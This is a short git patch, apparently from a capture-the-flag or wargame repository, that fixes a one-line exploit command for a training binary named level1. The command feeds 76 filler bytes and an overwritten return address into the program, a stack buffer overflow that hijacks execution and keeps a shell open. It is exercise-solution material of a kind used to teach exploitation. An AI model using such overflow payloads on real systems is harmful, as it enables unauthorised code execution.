From 89d0e5d442cb873f6e44f8895b68fcfd938565eb Mon Sep 17 00:00:00 2001 From: 0x35c Date: Mon, 28 Apr 2025 17:10:55 +0200 Subject: [PATCH] fix: add the python to the exploit command --- level1/ressources/exploit | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/level1/ressources/exploit b/level1/ressources/exploit index 7b2f7db..922dcb6 100644 --- a/level1/ressources/exploit +++ b/level1/ressources/exploit @@ -1 +1 @@ -(print('a'*76 + "\x44\x84\x04\x08"); cat) | ./level1 +(python -c 'print("a"*76 + "\x44\x84\x04\x08")'; cat) | ./level1